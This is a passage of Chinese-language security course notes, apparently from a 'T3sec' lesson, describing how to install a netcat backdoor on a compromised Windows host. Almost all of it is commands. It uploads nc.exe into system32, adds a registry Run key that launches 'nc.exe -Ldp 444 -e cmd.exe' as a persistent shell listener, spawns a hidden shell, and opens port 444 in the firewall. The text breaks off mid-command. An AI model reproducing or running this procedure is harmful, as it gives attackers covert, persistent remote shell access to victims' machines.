T3sec 学习笔记—–第八讲-nc后门

1 · · May 14, 2020, 2:54 a.m.
T3SEC —–第八讲:nc后门 隐藏后门1.nc后门上传upload/root/nc.exe c:\\windows\system322.修改注册表reg enumkey -kHKLM\softfware\microsoft\windows\currentversion\runreg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe’ //添加nc键值reg queryval -kHKLM\software\microsoft\windows\currentversion\run -v nc //查看3.防火墙 允许端口execute -f cmd -i -H //生成shellcmd: netsh firewall show opmode //查看防火墙状态.netsh firewall add portopening tcp 444 “textx” ENABLE ALLnetsh firew...